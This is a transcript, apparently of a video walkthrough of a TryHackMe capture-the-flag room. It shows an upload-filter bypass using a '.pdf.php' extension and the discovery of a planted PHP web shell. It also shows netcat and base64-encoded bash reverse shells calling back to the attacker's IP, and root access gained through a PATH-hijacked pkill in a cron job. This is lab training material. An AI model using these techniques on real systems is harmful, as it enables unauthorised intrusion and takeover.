Hello everyone, today we are going to do another room from TryHackMe that is named Hacker versus Hacker. So let's get going. First of all, I'm going to do the Rust scan as always. So Rust scan dash A for the target IP, then double dash U limit to set the limit of the scan. You can say speed of the scan, and then 5000 is the default speed of the Rust scan. So I'm using it because it's sometimes work without giving errors, and then followed with a double dash to specify the flag that you want to use in the nmap scan after the scan founds the available ports. So I'm going to use an aggressive scan, so dash a and then dash on to output the scan in normal format text file and I will name it scan all.txt. Right off we can see there are two ports open on the machine, that is 22 for SSH and 80 for HTTP. So let's copy this and then move into the web browser. Sorry, I've my burp suit, and let's paste it in here. Okay, so there we go. We have our website loaded. You can see we have a contact us page. You click that and we get redirected to contact us. Basically, we just get to scroll down. So let's see again. It's a recruit sec. Stop coding security vulnerabilities. Hire the best security consultants. Okay, so they're offering the security consultant services. So have some information here. Contact us is coming soon. And there we have a potential vector that we can use to exploit the server. You can see we have upload function here. It says please upload your CV. So CV is usually in the PDF format, or sometimes it also expresses the .docx format, that is the Word file format. You can try to actually upload a file, and instead of PDF I'm going to see what else we can upload. So I have a .dir file here. Let's create a simple file actually first. So in our nmap output we can see we have 22 port open and port 80, yeah, as always. Okay, so here this, and then I'm going to echo this is a text file and put this in text.txt. Okay, so we have a file here named text.txt. Perfect. So browse, try hack me, hacker versus hacker, and then text.txt. Okay, now I'm going to turn on the bub switch here so I can see what is going on in the background. Let's see if we have our intercept on. Yes, we do. Uploaded the CV, and let's take a look at the request. Alright, so it's making a post request to upload.php. You can see the name is file to upload and the file name is text.txt and we've uploaded. Content types, of course, text.blend because this is a text file, and then submit. Okay, so I will send this repeater for the future use and then intercept the response to this request. Forward this, and then we can see we have the response of this request. It says, hacked, if you do not want me to upload my shell, do better at filtering. So yeah, this room has a scenario in which this server is already hacked and we have to re-hack it. You can say we have to hack it once again and regain the control on the server. With this text we also have seriously dumb stuff. It is a PHP code and it actually tells you what function was used or what code was used to make that upload function work on this website. We can see the target directory is CVS, so that's a potential directory on the web server named CVS. So let's see if that is true. I'm going to turn off the intercept and let's see if CVS does exist. So CVS, and you can see it says directory listing disabled. So yeah, this file does exist. Oh, sorry, this folder does exist. Going back to repeater, send this request so that I can see the response of the request and see this code. Okay, so okay, target directory is CVs and then target file variable. So whatever starts with the dollar sign is actually a variable in the PHP. Okay, so target directory and then dot, that means plus kind of, and then base name files file to upload name. Okay, so what this line means is that that target file will be the inside CVs. It's like let me show you CVs. So the target file variable value will be equal to this CVs slash, because this is a target directory, so this will be pasted here because this is a variable, and then it will add the name of the file that we have chosen, so text.txt. So text.txt. So it will be kind of like this. So our file, so this is specified that our file will be saved in the CVs folder with the name of text.txt that we have specified. And then there's another thing. It checks whether strpos function. So this function means this function is used to find the string, the first occurrence of the string in a variable. So the variable is target file, and target file variable value is equal to this. We just calculated it, and it will check if the .pdf does exist on the name of the file or not. So if it does not, if it doesn't, then it will echo only PDF CVs are accepted. And this another function that is else if. So if file already exists with this name text.txt on the server, then it will echo the CV has already been uploaded. So you cannot upload the same file again and again, or you can say you cannot upload the same file with the same name again and again. Then we have another else if statement which says move the uploaded file to file to upload temp name target file. Yeah, so that in brief, it saves the file if everything is fine to this CVs folder with the same name of the file that we have specified, and it will say success, we will get back to you. Else it will echo something went wrong. Okay, so you may be wondering that we can actually try to upload a PHP reverse shell here, but you can see that this piece of code has been disabled because this has been turned into a comment. You can see right here that is why we can see this code on a PHP page. Otherwise, if this code was embedded on the server, then we would not be able to see it because PHP executes the code. It does not shows you the code like HTML or CSS or JavaScript. So that's why this thing will not work anymore. That's why you can see it just says here hacked. Whatever you specify, even if .pdf or whatever, if I even do it text.pdf, it will still say the same thing. It says hacked because this function is not working anymore. The hacker who hacked this just did this, embedded this piece of line on the response of this request, you can say. Okay, so we know that that this code was working before hacker hacked this website. So what he did was he surely made uh, a file with the name of whatever the name was. I will say the name is xyz, and then dot, he embedded pdf and then dot php. How do I know that? Because the escaping vector on this is very easy. You can easily hack it. The strpose function checks for the .pdf a string in a variable that is target file. So our target file is whatever file name we provide to the server. So for example, if I provide text.pdf, then it will see, oh, .pdf does exist. Okay, all right, then I should allow it. What if I do .php? Then it will say, it will detect that .pdf exists, so it will think, yeah, okay, this file is fine, but we have actually embedded .php, so that makes this file a PHP file, and that contains our piece of malicious code that we would have embedded here. It could be anything, for example a reverse shell with a PHP, and that is what the hacker has done here to take over the server. So we know that the file extension that this hacker has used ends with the .pdf.php, because this is only the vector that can be used here to hack this server. Alright, so with this piece of information we can actually brute force the file name, and the rest we will supply this pdf.php extension, and then we can potentially find the web shell that has been uploaded on this server. So I hope that makes sense. So let's do it. So I'll use gobuster dir -u 10.10.130 dot 220 slash cvs uh, because that web shell has been uploaded inside the cvs directory. That is why I'm posting this directory. So let's http, and then I'm going to use the word list here, user share word list. Let's use sec list. I guess that's inside discovery file system. No, it was actually web content, I believe. Web content, what was it? Maybe, yeah, raft small words .txt, and then extension would be .pdf.php. Okay, let's see what happens. I think I should increase the threads here, maybe. Okay, so let's increase the threads a little bit. 50 will be fine, I believe. By default, threads used by GoBuster is how much? It's 10 by default, but I specified 50 here. So that makes our scan a little bit faster. Here you can see everything gives us 403, 403, 403 with the size of 278. So 403 means forbidden, but here we have 200, that is dot, and that is a false positive. It leads us to nowhere on the same page. It leads us to the same page. So if I specify dot here, it will take me to the same page. Next we have a file named shell.pdf.php, and that is the status of 200 and the size 18. So that looks like it's working. So shell.pdf.php, and then it says boom. Okay, if I press Ctrl U to view the source code, you can see there's a pre-tag here and an ending pre-tag, and then a boom pre-tag, and that's in red. It says start text scene without seeing a doc typos, expected doctype.html, and then the pre ends. If you have played a lot with those reverse shells of PHP, then you know what this means. This is a basic reverse shell used in PHP. You can say one-liner PHP, I guess. One-liner PHP reverse shell. There was that one reverse shell that I'm looking for. It let's see. Yeah, there we have it. So let's, if I try using it just for a moment. So python -m http dot server et, use sudo for that. Here I'm going to do echo to test.php. I'm going to say shell.php. Okay, so we have our shell.php file here. Let's see. So localhost shell.php. Oops, it was downloading. I have to use the PHP server here actually. So php-s localhost. Oops, was that 127.0.0.1? Yeah, there we have it. So localhost. It says request was not found on the server. I have to specify the file that I'm accessing. So it's shell.php. And then there we have it. If I use a page source, we have nothing. Use cmd equals to hello, or you can say id, and it executes our code. So for this one, we have to actually specify the parameter. I specify the parameter cmd because I use that one in my payload here. It says get cmd. So this kind of reverse shell is the one that is being used here, and for the pretext that you can see right here. So if I use cmd equals to id here, you can see uid, gid, you can see the command output inside those pretexts. So I'm not sure why those pretexts are there, but whenever you can see shell, a reverse shell in PHP, and then there's just a string or just a blank page, then you should always try for the specifying those parameters, hidden parameters that can lead you to execute the reverse shell. So that is what I tried to show you here. So uh, let's see what was the content inside the reverse shell used by this hacker. So we can actually see that file here. You can see shell.pdf.php here. So let's do cat shell.pdf.php, and here we have it. It's pre php pre boom. Okay, so this is the payload used by the hacker. So let's paste that here. Okay, so there was the same piece of code that we used earlier. Difference is he specified this inside those pre tags. That's it, and then a boom here. So if I browse over to shell.php again, you can see a boom here. Control U for the viewing the source code, and we can see nothing here. No pre tags, but there we did. Get shell.php pre. Not sure why we cannot see those pre-tags, but let's just leave that. And let's continue on with our enumeration. Okay, so we have our CMD here. So now let's see if netcat is installed in this box or not. Yes, it is. So we're going to use a simple netcat reverse shell here. Also, before that, I would like to see which user we are. Probably www-data. So I'm going to see UMI, and yes, indeed we are. So if I do nc 10 17 1 2 5 3 1 2 3 4 dash e bin bash, open netcat listener on port 1 2 3 4, enter here. We have nothing. What if bin sh? And nothing. Let's try that once again. User bin nc. I guess you have to use nc-nv. Not sure. Nope. Okay, so I'm not sure why it's not working. We can try another thing, that is to actually base64 encode this. So if I do echo and base64 this, we have this string. One thing I would like to do here is I want to remove this equals to sign. So maybe by putting a space here, and yes, it did. The reason I wanted to remove this equals to, because this actually kind of uh, interferes in the working of the reverse shell, because this is kind of considered a special character that can hinder with the payload that we are specifying. So I like to do here base64-d code -d, and then pass it to bash. Nothing works. Okay, so I was just kind of experimenting here if netcat will work here, but it isn't. So now we are going to use our older one, that is bash reverse shell, my favorite one. I'm trying to memorize it, but I just can't. So go specify 1 2 3 4 here, and then my TryHackMe IP, pass it to base64, and here you can see we have equals to sign here and equals to sign here. I will have to remove those because those are special characters. Remove that equals to, remove that plus, equals to again. Let's just remove it. Please. Okay, yes, we have it here. Echo, oops, echo, and then base64-d, and that would give us base64 decoded string. Yes, here we have. Now we want to pass this string to bash, so this string gets executed and we get the reverse shell. So enter here, and this is just loading, so that's a good sign, and we have a reverse shell. Okay, so python 3 -c import with pty.spawn and bash. Okay, says nope and just exits out. So looks like something's wrong here. We still have the access. File to export term equals to x term. Clear? Okay. So let's go back and remember we saw a nope there, so that means something is executing. Let's go back, more back. We can check out the backups folder in just in case we have something. No, that's just the default files there. So let's go inside the home directory, and we have a username latchlen. So let's go there. We have our user flag there and our bash history file that may contain something because it's 168, and then a bin folder here. So let's check out the bash history file first. Okay, so cv.sh was executed, cv bash.sh was executed, and then vi etc cron.dpersistence. So cron file was executed or edited because with the v, and then echo dash e, this string, and then this is the way123 password, and then ls-sf dev null home /run bash history. Okay, so looks like this is our password because this is the way123. So I guess this is the password of the latchlen user. We can try that. We can also try to log in with the root with this password. So now I'm going to say su root just in case that might work. Let's copy this, paste it here, and it says authentication failure. So I'm going to do su latchlen, paste the password, and do ls. We have the access, so who am I? And we have latchlen. Perfect. So now say python 3-c import pty py.spawn bin bash, and here we are. Perfect. Now let's go into the bin directory and let's see what here. Your backup.sh file. So get backup.sh. Oops, what just happened? I just tapped backup and nope came in between, and it just threw me out of that Python 3 TTY shell. But here, because this is not a TTY shell, I can still access this one. So let's go inside cd bin and then get backup.sh. It says to do pita website backup as requested by Her Majesty. Not sure what that means. Remember that in the bash history file we saw cron persistence. So let's see what is in there. At okay, so path has been specified as the home /len bin and user bin, and here we can see root backup root bin sleep 1 11 21. Oh my god. And for f in bin ls def pts, this is you can say it's listing the contents in the pts folder. So for every listing in the pts folder it will do echo nope and echo nope to the redirected. It will be redirected to the pts $f, that means $1, $2, $3, whatever the number of listings are there, and pkill-9-t pdf, and then kill that specified shell. Okay, that's why we were getting exited out of the server once again and again. So in case you do not know what's pts, let me show you. So def pts, here we are. You can see here 0 1 2 3 ptmx 0 1 2 3. So these are the number of shells that I have opened. So 0 means the 0th shell, that is this one. I'm running TryHackMe VPN here, and in the first one, then second, then third, these are all the windows that I have opened. So if I do something like echo, you can say hello, and I redirect this hello to dev pty1. So sorry, pts actually, pts, and then the first one. So I do this, and if I go back to my TryHackMe VPN window, you can see here it says hello here. And I'm not sure what's the zero. Whoa, what just happened? Zero is this one, I guess. Yeah, zero is Windows is this. Okay. And then the second one is that one. You can see here is hello there. And then the third one is also this one. Well, I'm not sure, but you can see here. So that basically means to do something on another session, you can say. So let's see if we can execute any commands here. So if I say who am I to def bts 2, it says still. Of course we can. Okay, so actually we're executing our command here in our local session, and then the output of that command will be shown in that window. Okay, so that's pretty cool. So if I do ls here, you can see the output there. Okay, so so if I do exit here, I don't know what just happened. Whatever, leave it. Okay, so we know that what is being happening here. Uh, a thing here that you can see is ls, pts, whatever these binaries are, they're provided the full path. Even the echo command and even the pts command, but pkill command is missing that path, the full path. So we can kind of, you can say, hijack this binary. How? You can see the path is home /len bin. So we kind of control this directory. So if I go to home /len bin, you can see there's only a backup directory here, a backup folder here. So if I create a file named pkill here, and since we are /len user, we were able to create it. And here I will echo something like you can say you can say VMI, and then redirect the output of VMI to temporary out. Okay, so if I do cat pkill, our payload is VMI, and then output that to temp out. So what will happen here is when this pkill will be called by this cron, it will search for that pkill binary in the path, and our path is home /len bin. So it will first of all check the pkill binary in this specific directory, and that will execute our malicious binary that we just created. So let's see if our binary has been executed or not. So I'm gonna go to get temp out. Maybe that file has been created. No, it has not been created till now. Okay, so we can actually try to execute that cron file, that cron job, sorry. So I'm going to do ssh /len at the rate 10 10 130 220 10 10 130 220. Yes, there. And the password is that this is the way 123, and then we are in. So any second we oh, okay. I was not even able to say that, and it says nope, and then the connection closed. Okay, so let's see. Maybe we have our pkill here now. Well, wait a second. One thing you note that our pkill was not executed because our malicious one was not executed because you can see the real one was executed and we were kicked out. So something is wrong here. Let's see. We're in the home /len bin. We have created pkill. Do we have to actually give it executable permissions? Maybe. Let's see. Connect again. This is the way 1 2 3. Okay, so we are in. Let's go inside temporary file, and we can see a nope came, but our pkill did not work. That means we were not kicked out of the shell, and that actually means our malicious pkill was executed. So we would be having something inside temporary folder, the out file. So we do cat out, you can see we are root. because our world map was executed. So we can actually modify this out and put a reverse shell here, and we can catch the reverse shell to the netcat listener. So I'm going to say nc dash lb np 1 2 3 4, and then the reverse shell here. That is our beautiful one, that is bash. So let's go. It's 10 17 1 2 5 3 1 2 3 4 0 greater than and 1, and put that inside pickle. Okay, so we should get the visual any second now. Sorry for the sloppy cut. Actually, my internet went out and I had to wait for the net to come back, and here it is. So here we can see nope nope is coming back, and our PKL is getting executed, but our payload is not working. So something's wrong with the payload, I believe so. So I'm going to do that trick once again. What I'm going to do is echo this, and then base64 decode this. Sorry, base64 encode this actually, and we have this string. Now remove those plus. Well, actually we do not need to remove those pluses because this is inside we can say terminal session, not in the browser or URL. So I'm going to do is echo this. Let's put that in double quotes. So echo this. Oh god, what am I doing? Echo, then echo this. Wow, that's awesome. And base64 decode this and then pass this to bash. I believe that's sufficient. And then okay, put this into pickle. So cat pickle, and there we have the root shell there. Awesome. Okay, so thank god I completed this video recording before my battery just went out. Alright, so that is it for this room. If you have any questions, make sure to join my Discord server, and I'll see you right there. And that's it for this video. Let me save this video before my battery runs out. I'll see you in the next one.